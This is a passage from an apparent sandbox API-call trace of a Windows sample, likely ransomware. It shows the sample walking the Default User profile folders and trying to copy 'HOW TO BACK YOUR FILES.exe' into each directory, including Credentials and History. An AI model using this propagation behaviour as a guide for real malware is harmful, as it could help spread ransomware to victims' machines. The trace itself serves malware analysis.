nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.015] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.015] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.015] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0066.015] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0066.015] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.015] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.016] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.016] GetLastError () returned 0x0 [0066.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.016] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.016] CloseHandle (hObject=0x154) returned 1 [0066.016] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.016] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.016] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.016] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.016] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0066.016] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0066.016] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.017] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.017] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.017] GetLastError () returned 0x0 [0066.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.017] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.017] CloseHandle (hObject=0x154) returned 1 [0066.017] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.017] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.018] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.018] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.018] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0066.018] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0066.018] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.018] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.018] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.019] GetLastError () returned 0x0 [0066.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.019] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.019] CloseHandle (hObject=0x154) returned 1 [0066.019] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.019] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.019] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.019] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.019] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0066.019] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0066.019] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.020] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.020] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.020] GetLastError () returned 0x0 [0066.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.020] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.020] CloseHandle (hObject=0x154) returned 1 [0066.020] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.020] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.021] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.021] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.021] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0066.021] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0066.021] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.021] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.021] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.022] GetLastError () returned 0x0 [0066.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0066.022] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0066.022] CloseHandle (hObject=0x154) returned 1 [0066.022] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.022] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.022] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.022] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.022] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0066.022] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0066.022] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.022] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.023] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.023] GetLastError () returned 0x0 [0066.023] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.023] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.024] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.024] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.024] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0066.024] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0066.024] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.024] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.024] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.025] GetLastError () returned 0x0 [0066.025] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.025] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.025] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.025] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.025] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0066.025] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0066.025] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.025] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.026] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.026] GetLastError () returned 0x0 [0066.026] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.026] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.026] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.026] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.026] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0066.027] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0066.027] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.027] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.027] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.027] GetLastError () returned 0x0 [0066.027] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.027] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.028] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.028] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") 